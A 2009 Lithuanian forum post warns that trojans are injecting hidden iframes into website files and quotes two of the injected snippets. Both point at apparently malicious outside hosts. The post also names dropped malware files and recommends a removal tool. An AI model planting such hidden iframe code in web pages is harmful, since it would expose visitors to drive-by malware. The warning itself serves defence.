Parašė ozzWANTED· 2009 Lie. 25 20:07:45
#1
Taigi, norėčiau informuoti, kad internete pasklido backdoor trojanai.
Principas - užkrečiami Jūsų tinklapio failai. Užkrėtimų pavyzdys:
<iframe src="http://x8y.ru:8080/ts/in.cgi?pepsi115" width=125 height=125 style="visibility: hidden"></iframe>
Bei:
echo "<iframe src=\"http://fabujob.com/?click=[ID]\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
Redirectas pirmojo adreso eina į:
http://xb5.ru:8080/index.php
Per kelias pastarasias dienas sugebėjau patekti į 3
LIETUVIŠKUS taip apkrėstus saitus. Bijau dabar sumeluoti, bet n-design.lt buvo tame sąraše irgi.
Kaip suprantu backdoor'as išnaudoja kartu ir Internet Explorer 7 ( o gal ir 8) saugumo kažkokią tai spragą, tad nerekomenduočiau eiti į nepatikimus saitus su IE7 artimiausiu metu.
Jeigu visgi tai padarysite, rizikuojate apskrėsti Malware virusu, iš serijos:
wpv[number].exe
arba:
_ex-68.exe
Kaip softą naikinantį šiuos virusus rekomenduočiau išbandyti:
malwarebytes anti-malware
NOD32 viruso tinkamai pašalinti nesugeba. :)
Redagavo ozzWANTED· 2009 Rugp. 2 21:08:52